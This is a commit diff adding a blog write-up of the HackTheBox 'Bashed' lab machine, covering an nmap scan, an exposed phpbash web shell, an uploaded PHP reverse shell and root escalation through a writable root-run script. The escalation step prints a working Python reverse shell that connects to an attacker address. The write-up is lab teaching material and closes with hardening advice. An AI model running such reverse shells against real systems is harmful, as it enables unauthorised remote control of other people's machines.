add: writeup-ctf

2024-03-02 21:49:07 +01:00
parent ff520654f0
commit 095a13b2c9
1021 changed files with 9299 additions and 0 deletions
--- a/content/writeup-ctf/writeup-bashed-htb/featured.png
+++ b/content/writeup-ctf/writeup-bashed-htb/featured.png
--- a/content/writeup-ctf/writeup-bashed-htb/featured.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/featured.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-1.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-10.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-2.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-3.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-4.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-5.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-6.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-7.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-8.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-9.png
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png
--- a/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp
--- a/content/writeup-ctf/writeup-bashed-htb/index.md
+++ b/content/writeup-ctf/writeup-bashed-htb/index.md
@ -0,0 +1,88 @@
+---
+title: "Writeup - Bashed (HTB)"
+date: 2022-05-03
+slug: "writeup-bashed-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Bashed](https://app.hackthebox.com/machines/Bashed) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.68
+```
+One TCP port are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.18)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the site's folders.
+
+![](img/image-3.webp)
+
+Quite a few things and in particular the `/dev` folder which contains the 2 following files:
+
+![](img/image-4.webp)
+
+After some research they correspond to the following project: [phpbash](https://github.com/Arrexel/phpbash). Globally it is a cmd directly integrated in a web page. So I go to the page and start to look if there are interesting things:
+
+![](img/image-5.webp)
+
+Rather fast, we can already get the first flag!
+
+## Privilege escalation
+
+Although functional, the cmd in the browser remains limited. So I upload a PHP reverse shell in the `html/uploads` folder.
+
+![](img/image-6.webp)
+
+I now have a reverse and I can check the sudo permissions of my user.
+
+![](img/image-7.webp)
+
+![](img/image-8.webp)
+
+So he has the authorization to execute any command as `scriptmanager`. So I search for files/scripts on the machine and find the `/scripts`. I check the permissions with the following command:
+
+![](img/image-9.webp)
+
+Looking at the content of the script I realize that there is an automatic execution of the script by the root user. Indeed the file `test.txt` belongs to root and was created a short time ago.
+
+
+```bash
+f = open("test.txt", "w")
+f.write("testing 123!")
+f.close
+```
+So I modify the script with the following program:
+
+
+```bash
+import socket,subprocess,os
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("10.10.14.4",1234))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+t=subprocess.call(["/bin/sh","-i"])
+```
+After a few minutes, I have a reverse shell root and I can recover the last flag.
+
+![](img/image-10.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not run phpbash.php directly on the machine, use containers to isolate it for example
+- Reduce the permissions of the user hosting the applications to a strict minimum
+- Do not run a script automatically as root if it can be modified by other users